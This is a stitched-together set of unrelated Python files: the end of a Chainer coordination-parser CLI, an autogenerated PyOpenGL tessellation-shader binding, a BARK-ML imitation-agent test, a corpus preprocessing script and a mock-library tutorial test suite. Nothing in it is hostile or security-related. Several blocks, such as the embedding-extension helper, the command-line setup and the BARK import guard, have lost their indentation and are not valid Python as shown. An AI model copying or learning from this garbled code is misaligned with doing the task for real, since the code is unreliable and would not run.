        xs, ts = batch[:-1], batch[-1]
        ys = model.forward(*xs)
        loss = model.compute_loss(ys, ts)
        with reporter:
            values = dict(loss=float(chainer.cuda.to_cpu(loss.data)))
            model.compute_accuracy(ys, ts)
            for k, v in model.result.items():
                if 'loss' in k:
                    values[k] = float(chainer.cuda.to_cpu(v.data))
                elif 'accuracy' in k:
                    values[k] = v
            reporter.report(values)
        evaluator.on_batch_end({'train': False, 'xs': xs, 'ts': ts})
        pbar.update(len(ts))
    pbar.close()
    # NOTE(review): relies on Reporter's private _output_log API.
    reporter._output_log("testing", reporter.get_summary(),
                         {'epoch': -1, 'size': len(test_dataset)})
    evaluator.on_epoch_validate_end({'epoch': -1})
def _get_cont_embed_file_ext(encoder_input):
ext = None
if sum(('elmo' in encoder_input,
'bert-base' in encoder_input,
'bert-large' in encoder_input)) > 1:
raise ValueError('at most 1 contextualized emebeddings can be chosen')
elif 'elmo' in encoder_input:
ext = '.elmo.hdf5'
elif 'bert-base' in encoder_input:
ext = '.bert-base.hdf5'
elif 'bert-large' in encoder_input:
ext = '.bert-large.hdf5'
return ext
def parse(model_file, target_file, contextualized_embed_file=None,
          n_best=1, device=-1):
    """Parse sentences with a trained model and print coordination analyses.

    Args:
        model_file: Trained model file (npz) with saved training context.
        target_file: Input file; a '.txt' suffix switches to plain-text mode.
        contextualized_embed_file: Required iff the model was trained with a
            contextualized embedding input.
        n_best: Number of candidate analyses to print per sentence.
        device: GPU device id, or a negative value for CPU.

    Raises:
        ValueError: when contextualized_embed_file presence does not match
            how the model was trained.
    """
    context = utils.Saver.load_context(model_file)
    logger = logging.getLogger()
    logger.trace('# context: {}'.format(context))
    if context.seed is not None:
        utils.set_random_seed(context.seed, device)
    loader = context.builder.loader
    encoder_input = context.encoder_input
    use_cont_embed = _get_cont_embed_file_ext(encoder_input) is not None
    if use_cont_embed and contextualized_embed_file is None:
        raise ValueError(
            "contextualized_embed_file must be specified when using "
            "a model trained with contextualized embeddings")
    elif not use_cont_embed and contextualized_embed_file is not None:
        raise ValueError(
            "contextualized_embed_file must not be specified when using "
            "a model trained without contextualized embeddings")
    if target_file.endswith('.txt'):
        # Plain-text input: switch the reader to the default format.
        loader.init_reader(format='default')
    loader.set_contextualized_embed_file(contextualized_embed_file)
    target_dataset = loader.load_with_external_resources(
        target_file, mode='parse', use_external_postags=True, logger=logger)
    logger.info('{} samples loaded for parsing'.format(len(target_dataset)))
    model = context.builder.build()
    chainer.serializers.load_npz(model_file, model)
    if device >= 0:
        chainer.cuda.get_device_from_id(device).use()
        model.to_gpu(device)
    parser = parsers.build_parser(loader, model)
    logger.info('Start parsing')
    utils.chainer_train_off()
    pbar = tqdm(total=len(target_dataset))
    for batch in target_dataset.batch(
            context.batch_size, colwise=True, shuffle=False):
        # The last three columns carry raw words, index maps and sentence ids.
        xs, (words, indices, sentence_id) = batch[:-3], batch[-3:]
        parsed = parser.parse(*xs, n_best)
        for results, words_i, indices_i, sentence_id_i \
                in zip(parsed, words, indices, sentence_id):
            raw_sentence = ' '.join(words_i)
            for best_k, (coords, score) in enumerate(results):
                output = [
                    "#!RAW: {}".format(raw_sentence),
                    "SENTENCE: {}".format(sentence_id_i),
                    "CANDIDATE: #{}".format(best_k),
                    "SCORE: {}".format(score),
                ]
                if indices_i is not None:
                    # Map token positions back to the original sentence.
                    coords = dataset.postprocess(coords, indices_i)
                for cc, coord in sorted(coords.items()):
                    output.append("CC: {} {}".format(cc, words_i[cc]))
                    if coord is not None:
                        # Whole coordination span: first conjunct start to
                        # last conjunct end.
                        b, e = coord.conjuncts[0][0], coord.conjuncts[-1][1]
                        output.append("COORD: {} {} {}".format(
                            b, e, ' '.join(words_i[b:e + 1])))
                        for (b, e) in coord.conjuncts:
                            output.append("CONJ: {} {} {}".format(
                                b, e, ' '.join(words_i[b:e + 1])))
                    else:
                        output.append("COORD: None")
                print('\n'.join(output) + '\n')
        pbar.update(len(sentence_id))
    pbar.close()
def check_grammar(test_file, limit=-1, grammar_type=1):
    """Sanity-check a CFG: parse gold data with a gold-scoring model and
    report how many coordination structures are reproduced exactly.

    Args:
        test_file: Gold data file.
        limit: Cap on samples (negative = no cap).
        grammar_type: 1 or 2, selecting which coordination CFG to test.

    Raises:
        ValueError: if grammar_type is not 1 or 2.
    """
    logger = logging.getLogger()
    loader = dataset.DataLoader(filter_coord=True)
    test_dataset = loader.load(test_file, train=True, bucketing=False,
                               size=None if limit < 0 else limit)
    word_vocab = loader.get_processor('word').vocab
    from models.gold import GoldModel
    model = GoldModel()
    if grammar_type == 1:
        cfg = parsers.Grammar.CFG_COORD_1 + parsers.Grammar.CFG
    elif grammar_type == 2:
        cfg = parsers.Grammar.CFG_COORD_2 + parsers.Grammar.CFG
    else:
        raise ValueError("Invalid grammar type: {}".format(grammar_type))
    grammar = parsers.Grammar(word_vocab, cfg)
    parser = parsers.CkyParser(model, grammar)
    evaluator = eval_module.Evaluator(
        parser, logger=logger, report_details=False)
    n_corrects = 0
    pbar = tqdm(total=len(test_dataset))
    for batch in test_dataset.batch(size=20, colwise=True, shuffle=False):
        xs, ts = batch[:-1], batch[-1]
        true_coords_batch = ts
        # The gold model scores derive from the gold coordinations themselves.
        model.set_gold(true_coords_batch)
        pred_coords_batch = evaluator._parser.parse(*xs, n_best=1)
        for i, (pred_coord_entries, true_coords) in \
                enumerate(zip(pred_coords_batch, true_coords_batch)):
            pred_coords, _score = pred_coord_entries[0]
            # Compare only non-None coordinations on both sides.
            true_coords = {ckey: coord for ckey, coord
                           in true_coords.items() if coord is not None}
            for k, v in tuple(pred_coords.items()):
                if v is None:
                    del pred_coords[k]
            if pred_coords == true_coords:
                n_corrects += 1
            else:
                sentence = ' '.join(
                    [word_vocab.lookup(word_id) for word_id in xs[0][i]])
                print("SENTENCE: {}\nPRED: {}\nTRUE: {}\n-"
                      .format(sentence, pred_coords, true_coords))
            evaluator.add(pred_coords, true_coords)
        pbar.update(len(ts))
    pbar.close()
    evaluator.report()
    logger.info("Number of correct tree: {}/{}"
                .format(n_corrects, len(test_dataset)))
if __name__ == "__main__":
App.configure(logdir=App.basedir + '/../logs')
logging.AppLogger.configure(mkdir=True)
App.add_command('train', train, {
'batch_size':
arg('--batchsize', type=int, default=20, metavar='NUM',
help='Number of examples in each mini-batch'),
'cache_dir':
arg('--cachedir', type=str, default=(App.basedir + '/../cache'),
metavar='DIR', help='Cache directory'),
'disable_cache':
arg('--nocache', action='store_true', help='Disable cache'),
'test_file':
arg('--devfile', type=str, default=None, metavar='FILE',
help='Development data file'),
'device':
arg('--device', type=int, default=-1, metavar='ID',
help='Device ID (negative value indicates CPU)'),
'embed_file':
arg('--embedfile', type=str, default=None, metavar='FILE',
help='Pretrained word embedding file'),
'n_epoch':
arg('--epoch', type=int, default=20, metavar='NUM',
help='Number of sweeps over the dataset to train'),
'format':
arg('--format', type=str, choices=('tree', 'genia'), default='tree',
help='Training/Development data format'),
'grad_clip':
arg('--gradclip', type=float, default=5.0, metavar='VALUE',
help='L2 norm threshold of gradient norm'),
'encoder_input':
arg('--inputs', type=str,
choices=('char', 'postag', 'elmo', 'bert-base', 'bert-large'),
nargs='*', default=('char', 'postag'),
help='Additional inputs for the encoder'),
'l2_lambda':
arg('--l2', type=float, default=0.0, metavar='VALUE',
help='Strength of L2 regularization'),
'limit':
arg('--limit', type=int, default=-1, metavar='NUM',
help='Limit of the number of training samples'),
'lr':
arg('--lr', type=float, default=0.001, metavar='VALUE',
help='Learning Rate'),
'model_config':
arg('--model', action='store_dict', metavar='KEY=VALUE',
help='Model configuration'),
'refresh_cache':
arg('--refresh', '-r', action='store_true', help='Refresh cache'),
'save_dir':
arg('--savedir', type=str, default=None, metavar='DIR',
help='Directory to save the model'),
'seed':
arg('--seed', type=int, default=None, metavar='VALUE',
help='Random seed'),
'train_file':
arg('--trainfile', type=str, required=True, metavar='FILE',
help='Training data file'),
})
App.add_command('test', test, {
'filter_type':
arg('--filter', type=str,
choices=('any', 'simple', 'not_simple', 'consecutive', 'multiple'),
default='any', help='Filter type for sentence'),
'device':
arg('--device', type=int, default=-1, metavar='ID',
help='Device ID (negative value indicates CPU)'),
'limit':
arg('--limit', type=int, default=-1, metavar='NUM',
help='Limit of the number of training samples'),
'model_file':
arg('--modelfile', type=str, required=True, metavar='FILE',
help='Trained model file'),
'test_file':
arg('--testfile', type=str, required=True, metavar='FILE',
help='Test data file'),
})
App.add_command('parse', parse, {
'contextualized_embed_file':
arg('--cembfile', type=str, metavar='FILE',
help='Contextualized embeddings file'),
'device':
arg('--device', type=int, default=-1, metavar='ID',
help='Device ID (negative value indicates CPU)'),
'model_file':
arg('--modelfile', type=str, required=True, metavar='FILE',
help='Trained model file'),
'n_best':
arg('--nbest', type=int, default=1, metavar='NUM',
help='Number of candidates to output'),
'target_file':
arg('--input', type=str, required=True, metavar='FILE',
help='Input text file to parse'),
})
App.add_command('check', check_grammar, {
'grammar_type':
arg('--grammar', type=int, choices=(1, 2), default=1,
help='grammar type'),
'limit':
arg('--limit', type=int, default=-1, metavar='NUM',
help='Limit of the number of training samples'),
'test_file':
arg('--testfile', type=str, required=True, metavar='FILE',
help='Test data file'),
})
App.run()
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_tessellation_shader'
# Autogenerated binding helper: wraps a raw extension entry point with
# platform dispatch and GL error checking. Do not hand-edit.
def _f( function ):
    return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_tessellation_shader',error_checker=_errors._error_checker)
# Autogenerated GL_ARB_tessellation_shader enum constants. Do not hand-edit.
GL_CCW=_C('GL_CCW',0x0901)
GL_CW=_C('GL_CW',0x0900)
GL_EQUAL=_C('GL_EQUAL',0x0202)
GL_FRACTIONAL_EVEN=_C('GL_FRACTIONAL_EVEN',0x8E7C)
GL_FRACTIONAL_ODD=_C('GL_FRACTIONAL_ODD',0x8E7B)
GL_ISOLINES=_C('GL_ISOLINES',0x8E7A)
GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E1E)
GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E1F)
GL_MAX_PATCH_VERTICES=_C('GL_MAX_PATCH_VERTICES',0x8E7D)
GL_MAX_TESS_CONTROL_INPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_INPUT_COMPONENTS',0x886C)
GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_OUTPUT_COMPONENTS',0x8E83)
GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_CONTROL_TEXTURE_IMAGE_UNITS',0x8E81)
GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_CONTROL_TOTAL_OUTPUT_COMPONENTS',0x8E85)
GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS=_C('GL_MAX_TESS_CONTROL_UNIFORM_BLOCKS',0x8E89)
GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_CONTROL_UNIFORM_COMPONENTS',0x8E7F)
GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_INPUT_COMPONENTS',0x886D)
GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_OUTPUT_COMPONENTS',0x8E86)
GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS=_C('GL_MAX_TESS_EVALUATION_TEXTURE_IMAGE_UNITS',0x8E82)
GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_BLOCKS',0x8E8A)
GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS=_C('GL_MAX_TESS_EVALUATION_UNIFORM_COMPONENTS',0x8E80)
GL_MAX_TESS_GEN_LEVEL=_C('GL_MAX_TESS_GEN_LEVEL',0x8E7E)
GL_MAX_TESS_PATCH_COMPONENTS=_C('GL_MAX_TESS_PATCH_COMPONENTS',0x8E84)
GL_PATCHES=_C('GL_PATCHES',0x000E)
GL_PATCH_DEFAULT_INNER_LEVEL=_C('GL_PATCH_DEFAULT_INNER_LEVEL',0x8E73)
GL_PATCH_DEFAULT_OUTER_LEVEL=_C('GL_PATCH_DEFAULT_OUTER_LEVEL',0x8E74)
GL_PATCH_VERTICES=_C('GL_PATCH_VERTICES',0x8E72)
GL_QUADS=_C('GL_QUADS',0x0007)
GL_TESS_CONTROL_OUTPUT_VERTICES=_C('GL_TESS_CONTROL_OUTPUT_VERTICES',0x8E75)
GL_TESS_CONTROL_SHADER=_C('GL_TESS_CONTROL_SHADER',0x8E88)
GL_TESS_EVALUATION_SHADER=_C('GL_TESS_EVALUATION_SHADER',0x8E87)
GL_TESS_GEN_MODE=_C('GL_TESS_GEN_MODE',0x8E76)
GL_TESS_GEN_POINT_MODE=_C('GL_TESS_GEN_POINT_MODE',0x8E79)
GL_TESS_GEN_SPACING=_C('GL_TESS_GEN_SPACING',0x8E77)
GL_TESS_GEN_VERTEX_ORDER=_C('GL_TESS_GEN_VERTEX_ORDER',0x8E78)
GL_TRIANGLES=_C('GL_TRIANGLES',0x0004)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_CONTROL_SHADER',0x84F0)
GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER=_C('GL_UNIFORM_BLOCK_REFERENCED_BY_TESS_EVALUATION_SHADER',0x84F1)
# Autogenerated stub; the real entry point is installed by the @_f wrapper.
@_f
@_p.types(None,_cs.GLenum,arrays.GLfloatArray)
def glPatchParameterfv(pname,values):pass
# Autogenerated stub; the real entry point is installed by the @_f wrapper.
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glPatchParameteri(pname,value):pass
|
# Copyright (c) 2020 fortiss GmbH
#
# Authors: Julian Bernhard, Patrick Hart
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
try:
import debug_settings
except:
pass
import unittest
import numpy as np
from gym import spaces
# BARK imports
from bark.runtime.commons.parameters import ParameterServer
from bark_ml.library_wrappers.lib_fqf_iqn_qrdqn.agent import ImitationAgent
observation_length = 5
num_actions = 4
class TestObserver:
    """Minimal observer stub exposing a Box observation space."""

    @property
    def observation_space(self):
        # TODO(@hart): use from spaces.py
        zeros = np.zeros(observation_length)
        ones = np.ones(observation_length)
        return spaces.Box(low=zeros, high=ones)
class TestActionWrapper():
    """Minimal ML-behavior stub exposing a discrete action space."""

    @property
    def action_space(self):
        return spaces.Discrete(num_actions)
def action_values_at_state(state):
    """Build synthetic per-action cost values for one observation row.

    Returns [state, action_values] where the values are envelope costs
    followed by collision costs (return values stay empty by design).
    """
    envelope_costs = []
    collision_costs = []
    return_values = []
    for idx in range(1, num_actions + 1):
        envelope_costs.append(state[0]* 1.0/idx + state[1]* 1.0/idx)
        collision_costs.append(state[1]* 1.0/idx*0.001 + state[3]* 1.0/idx*0.001)
        collision_costs.append(state[3]* 1.0/idx*0.2 + state[4]* 1.0/idx*0.1)
    action_values = envelope_costs + collision_costs + return_values
    return [state, action_values]
def create_data(num):
    """Generate ``num`` random observations with synthetic action values."""
    observations = np.random.rand(num, observation_length)
    return np.apply_along_axis(action_values_at_state, 1, observations)
class TestMotionPrimitiveBehavior:
    """Stub exposing a fixed list of motion-primitive indices."""

    def __init__(self, num_actions):
        self._num_actions = num_actions

    def GetMotionPrimitives(self):
        return [idx for idx in range(self._num_actions)]
class TestDemonstrationCollector:
    """Stub collector: random demonstration data plus the stub wrappers above."""

    def __init__(self):
        self.data = create_data(10000)
        self._observer = TestObserver()
        self._ml_behavior = TestActionWrapper()
        self.motion_primitive_behavior = TestMotionPrimitiveBehavior(num_actions)

    def GetDemonstrationExperiences(self):
        return self.data

    @property
    def observer(self):
        return self._observer

    @property
    def ml_behavior(self):
        return self._ml_behavior

    def GetDirectory(self):
        # The stub keeps nothing on disk.
        return ""
class EvaluationTests(unittest.TestCase):
    # make sure the agent works
    def test_agent_wrapping(self):
        """Smoke-test: an ImitationAgent built from the stub collector runs."""
        params = ParameterServer()
        params["ML"]["BaseAgent"]["NumSteps"] = 10
        params["ML"]["BaseAgent"]["MaxEpisodeSteps"] = 2
        params["ML"]["BaseAgent"]["EvalInterval"] = 2
        params["ML"]["BaseAgent"]["TrainTestRatio"] = 0.2
        demonstration_collector = TestDemonstrationCollector()
        agent = ImitationAgent(agent_save_dir="./save_dir",
                               demonstration_collector=demonstration_collector,
                               params=params, checkpoint_load = False)
        agent.run()
# Run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
|
# coding=utf-8
"""Generate the pickle file of 1b_corpus dataset"""
import os
import pickle
from multiprocessing import Process, Queue
from Queue import Empty # Exception raised when a Queue is empty
from time import ctime
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize as wt
def process_data(pid, qs, path_in, path_out):
    """Worker: tokenize, clean and pickle each corpus file pulled from ``qs``.

    Args:
        pid: Worker id, used only in progress messages.
        qs: Queue of file names to process.
        path_in: Directory containing the raw corpus files.
        path_out: Directory receiving the <name>.pkl outputs.
    """
    # Hoisted out of the loop: rebuilding the stopword list per file was
    # wasted work, and a set makes the membership test O(1) per token.
    english_stopwords = set(stopwords.words('english'))
    # size_print = 10  # print size for test
    while not qs.empty():
        try:
            fname = qs.get()
            print('P%s start %s at %s' % (str(pid), fname, ctime()))
        except Empty:  # seems never reach here
            print('Finish at %s' % ctime())
            break
        fpath = os.path.join(path_in, fname)
        # tokenize and lower the case
        with open(fpath, 'r') as f:
            words_tok = [[word.lower() for word in wt(sent.decode('utf-8'))]
                         for sent in f]
        # remove punctuation and other non-alphabet character
        words_alphabet = [[word for word in words if word.isalpha()]
                          for words in words_tok]
        # remove stop words
        words_filtered = [[
            word for word in words if word not in english_stopwords
        ] for words in words_alphabet]
        with open(os.path.join(path_out, '%s.pkl' % fname), 'wb') as f:
            pickle.dump(words_filtered, f)
        print('P%s done %s at %s' % (str(pid), fname, ctime()))
def provide_data():
    """Spawn worker processes that preprocess every corpus file."""
    path_in = '/data/home/py/data/1b-corpus/trainset'
    path_out = './pkl/'
    if not os.path.exists(path_out):
        os.mkdir(path_out)
    queue_size = 100
    qs = Queue(queue_size)
    for fname in os.listdir(path_in):
        qs.put(fname)
    size_process = 3
    workers = []
    for pid in range(size_process):
        workers.append(Process(target=process_data,
                               args=(pid, qs, path_in, path_out)))
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
# Entry point: preprocess the corpus with a small process pool.
if __name__ == '__main__':
    provide_data()
    print('Finish...')
|
import unittest2 as unittest
from mock import DEFAULT, Mock, MagicMock, patch, create_autospec, call
import sys, time, re
THIS_MODULE = sys.modules[__name__]
class ClassUnderTest(object):
    """Subject for the mocking demos below; its collaborator is meant to be mocked."""

    def __init__(self):
        self._collaborator = Collaborator()

    def do_something(self, foo, bar, *args, **kwargs):
        self._helper(foo, bar, *args, **kwargs)
        # Fixed typo: was 'do_someting_complicated', which a spec'd mock of
        # Collaborator would reject with AttributeError.
        self._collaborator.do_something_complicated(
            self._helper(foo, bar), *args, **kwargs)

    def _helper(self, foo, bar):
        # Placeholder body; tests are expected to replace it with a mock.
        raise RuntimeError('ClassUnderTest._helper should be mocked.')
class Collaborator(object):
    """Collaborator whose construction and helper are intended to be mocked."""

    def __init__(self, data):
        # Placeholder body; tests are expected to patch the class.
        raise RuntimeError('Collaborator.__init__ should be mocked.')
        self._data = data  # unreachable on purpose: documents the intended attribute

    def do_something_complicated(self, foobar, *args, **kwargs):
        self._helper(foobar, *args, **kwargs)

    def _helper(self, foobar, *args, **kwargs):
        raise RuntimeError('Collaborator._helper should be mocked.')
# Keep a reference to the real class so isinstance checks survive patching.
CollaboratorOrig = Collaborator  # for type testing, after patching
class CollaboratorForTest(Collaborator):
    """Spec helper: declares instance attributes so spec'd mocks expose them."""
    _data = None  # as a placeholder, and will be configured later.
class MockTest(unittest.TestCase):
    """Baseline behavior of Mock and MagicMock attribute auto-creation."""

    def test_mock(self):
        mock = Mock()
        self.assertTrue(callable(mock))
        self.assertIsInstance(mock.this_attr, Mock)  # create attributes and new mocks when accessing them
        self.assertTrue(hasattr(mock, 'that_attr'))  # also true for hasattr test
        self.assertIsInstance(mock.that_attr, Mock)
        self.assertIs(mock.this_attr, mock.this_attr)  # always return the same mock
        self.assertIsNot(mock.this_attr, mock.that_attr)

    def test_magic_mock(self):  # behave in the same way
        mock = MagicMock()
        self.assertTrue(callable(mock))
        self.assertIsInstance(mock.this_attr, MagicMock)
        self.assertIsInstance(mock.that_attr, MagicMock)
        self.assertIs(mock.this_attr, mock.this_attr)
        self.assertIsNot(mock.this_attr, mock.that_attr)

    def test_magic_attributes(self):  # for both Mock and MagicMock
        mock, magic = Mock(), MagicMock()
        self.assertTrue(hasattr(mock, '__str__'))
        self.assertNotIsInstance(mock.__str__, (Mock, MagicMock))  # not patched
        self.assertFalse(hasattr(mock, '__xyz__'))
        with self.assertRaises(AttributeError):
            mock.__xyz__
        self.assertTrue(hasattr(magic, '__str__'))
        self.assertIsInstance(magic.__str__, MagicMock)  # pre-created
        self.assertFalse(hasattr(magic, '__xyz__'))
        with self.assertRaises(AttributeError):  # only magic methods are pre-created
            magic.__xyz__
class MockConfigTest(unittest.TestCase):
    """Configuring mocks via return_value and side_effect."""

    def test_return_value(self):
        mock = Mock(return_value=3)
        self.assertEqual(mock('foo'), 3)  # regardless of the arguments
        self.assertEqual(mock('bar'), 3)

    def test_side_effect(self):
        mock = Mock(side_effect=KeyError('foo'))  # exception instance
        self.assertRaises(KeyError, mock)
        mock = Mock(side_effect=KeyError)  # exception class
        self.assertRaises(KeyError, mock)
        mock = Mock(side_effect=('foo', KeyError('bar')))  # consecutive return values
        self.assertEqual(mock(), 'foo')
        self.assertRaises(KeyError, mock)
        self.assertRaises(StopIteration, mock)  # out of values

    def test_side_effect_function(self):
        def side_effect(x, y):
            mapping = {
                (0, 0): DEFAULT,
                (1, 2): 3,
                (3, 4): 7,
            }
            if (x, y) in mapping:
                return mapping[(x, y)]
            else:
                raise RuntimeError()
        fun = Mock(side_effect=side_effect)
        self.assertEqual(fun(1, 2), 3)
        self.assertEqual(fun(3, 4), 7)
        with self.assertRaises(RuntimeError):
            fun(1, 4)
        self.assertIsInstance(fun(0, 0), Mock)  # respect return_value, which is DEFAULT
        self.assertIs(fun(0, 0), fun(0, 0))
        fun.return_value = 99  # override the DEFAULT
        self.assertEqual(fun(0, 0), 99)
        self.assertEqual(fun(1, 2), 3)  # side_effect wins return_value

    def test_side_effect_wins_return_value(self):
        mock = Mock(side_effect=('foo',), return_value='bar')
        self.assertEqual(mock(), 'foo')  # side_effect wins
        self.assertRaises(StopIteration, mock)
        mock.side_effect = None  # side_effect should be disabled explicitly
        self.assertEqual(mock(), 'bar')

    def test_configure_mock(self): pass  # TODO
class SpecTest(unittest.TestCase):
    """spec / spec_set / autospec: attribute limits and isinstance behavior."""

    def test_spec(self):
        # returns an instance, instead of a class
        obj = Mock(spec=Collaborator)
        self.assertIsInstance(obj, Collaborator)  # pass isinstance tests
        self.assertIs(obj.__class__, Collaborator)
        self.assertTrue(hasattr(obj, 'do_something_complicated'))
        self.assertTrue(hasattr(obj, '_helper'))
        self.assertFalse(hasattr(obj, '_data'))  # not yet initialized
        with self.assertRaises(AttributeError):
            obj.xyz  # limited get
        obj.xyz = None  # unlimited set
        obj.do_something_complicated.return_value = 3
        self.assertEqual(obj.do_something_complicated(), 3)  # do not check call signature

    def test_spec_set(self):
        obj = Mock(spec_set=Collaborator)  # stricter variant
        #obj = Mock(spec=Collaborator, spec_set=True)  # doesn't work
        self.assertFalse(hasattr(obj, 'spec_set'))  # cannot be changed later
        self.assertTrue(hasattr(obj, 'side_effect'))
        self.assertIsInstance(obj, Collaborator)
        self.assertIs(obj.__class__, Collaborator)
        self.assertTrue(hasattr(obj, 'do_something_complicated'))
        self.assertTrue(hasattr(obj, '_helper'))
        self.assertFalse(hasattr(obj, '_data'))
        with self.assertRaises(AttributeError):
            obj.xyz  # limited get
        with self.assertRaises(AttributeError):
            obj.xyz = None  # limited set

    def test_spec_instance_attributes(self):
        obj = Mock(spec_set=CollaboratorForTest)
        self.assertIsInstance(obj, Collaborator)
        self.assertIs(obj.__class__, CollaboratorForTest)
        self.assertTrue(hasattr(obj, 'do_something_complicated'))
        self.assertTrue(hasattr(obj, '_helper'))
        self.assertTrue(hasattr(obj, '_data'))  # because of CollaboratorTest._data
        with self.assertRaises(AttributeError):
            obj.xyz  # limited get
        with self.assertRaises(AttributeError):
            obj.xyz = None  # limited set
        # XXXForTest only declares attributes, and they can be configured later.
        obj._data = create_autospec(str)
        obj._data.upper.return_value = 'DATA'
        self.assertEqual(obj._data.upper(), 'DATA')

    def test_autospec(self):
        # Mock(autospec=Collaborator) or Mock(spec=Collaborator, autospec=True) doesn't work
        obj = create_autospec(Collaborator, spec_set=True)
        self.assertIsInstance(obj, Collaborator)  # pass isinstance tests
        self.assertIs(obj.__class__, Collaborator)
        self.assertTrue(hasattr(obj, 'do_something_complicated'))
        self.assertTrue(hasattr(obj, '_helper'))
        self.assertFalse(hasattr(obj, '_data'))  # not yet initialized
        with self.assertRaises(AttributeError):
            obj.xyz  # limited get
        with self.assertRaises(AttributeError):
            obj.xyz = None  # limited set
        with self.assertRaises(TypeError):  # check call signature as well
            obj.do_something_complicated()

    def test_mock_add_spec(self): pass  # TODO
class PatchingTest(unittest.TestCase):  # TODO patch(), patch_xxx()
    """patch.object(): temporarily replace attributes of THIS_MODULE with
    spec_set mocks for the duration of each test method."""
    @patch.object(THIS_MODULE, 'Collaborator', spec_set=True)
    def test_mocking_classes(self, MockCollaborator):
        # While patched, the module-level name resolves to the mock class.
        obj = Collaborator('data')
        self.assertIs(obj, MockCollaborator.return_value)  # instance = return value
        self.assertIsInstance(obj, CollaboratorOrig)
        self.assertTrue(hasattr(obj, 'do_something_complicated'))
        self.assertTrue(hasattr(obj, '_helper'))
        self.assertFalse(hasattr(obj, '_data'))
        with self.assertRaises(AttributeError):
            obj.xyz  # limited get
        with self.assertRaises(AttributeError):
            obj.xyz = None  # limited set
    @patch.object(THIS_MODULE, 'Collaborator', spec_set=True)
    @patch.object(THIS_MODULE, 'CollaboratorForTest', spec_set=True)
    def test_nested(self, MockInner, MockOuter):  # inner to outer, bottom-up
        # Decorators apply bottom-up, so the innermost patch is the first argument.
        self.assertIs(MockInner, CollaboratorForTest)
        self.assertIs(MockOuter, Collaborator)
    def test_partial_mocking(self): pass  # TODO
class CallAssertionTest(unittest.TestCase):
    """Call-recording assertions on autospecced mocks: called/call_count,
    call_args/call_args_list, assert_called_with, assert_called_once_with,
    assert_any_call, assert_has_calls, and mock_calls vs method_calls.

    Uses assertRaisesRegex: the assertRaisesRegexp alias has been deprecated
    since Python 3.2 and was removed in Python 3.12.
    """
    def setUp(self):
        self.obj = create_autospec(CollaboratorForTest, spec_set=True)
    def test_called(self):
        fun = self.obj.do_something_complicated
        self.assertFalse(fun.called)
        fun('foo')
        self.assertTrue(fun.called)
    def test_reset(self):  # reset records, but configuration is retained
        fun = self.obj.do_something_complicated
        fun.return_value = 3
        self.assertEqual(fun('data'), 3)
        self.assertTrue(fun.called)
        fun.reset_mock()
        self.assertFalse(fun.called)
        self.assertEqual(fun('data'), 3)
    def test_called_and_args(self):  # last called with
        fun = self.obj.do_something_complicated
        self.assertIsNone(fun.call_args)
        self.assertEqual(fun.call_args_list, [])
        fun('foo')
        fun.assert_called_with('foo')
        self.assertEqual(fun.call_args, (('foo',),))
        self.assertEqual(fun.call_args, call('foo'))  # call_args is actually a call object
        self.assertEqual(fun.call_args_list, [call('foo')])
        with self.assertRaisesRegex(AssertionError, re.escape(
                '''Expected call: do_something_complicated(foobar='foo')\n'''
                '''Actual call: do_something_complicated('foo')''')):
            fun.assert_called_with(foobar='foo')  # equivalent, but not equal
        fun('foo', 'bar', extra='foobar')
        fun.assert_called_with('foo', 'bar', extra='foobar')  # most recent
        self.assertEqual(fun.call_args, (('foo', 'bar'), {'extra': 'foobar'}))
        self.assertEqual(fun.call_args, call('foo', 'bar', extra='foobar'))  # call() is more intuitive
        self.assertEqual(fun.call_args_list, [call('foo'), call('foo', 'bar', extra='foobar')])
        with self.assertRaisesRegex(AssertionError, re.escape(
                '''Expected call: do_something_complicated('foo')\n'''
                '''Actual call: do_something_complicated('foo', 'bar', extra='foobar')''')):
            fun.assert_called_with('foo')  # not 'ever' called with -> assert_any_call
    def test_called_once_with(self):  # accumulated
        fun = self.obj.do_something_complicated
        fun('foo')
        fun.assert_called_once_with('foo')
        fun('bar')
        with self.assertRaisesRegex(AssertionError, re.escape(
                '''Expected to be called once. Called 2 times.''')):
            fun.assert_called_once_with('bar')  # called twice, regardless of what arguments are
        self.assertEqual(fun.call_count, 2)
        fun('foobar')
        with self.assertRaisesRegex(AssertionError, re.escape(
                '''Expected to be called once. Called 3 times.''')):
            fun.assert_called_once_with('foobar')
        self.assertEqual(fun.call_count, 3)
    def test_any_call(self):  # ever called with
        fun = self.obj.do_something_complicated
        fun('foo')
        fun.assert_any_call('foo')
        fun('bar')
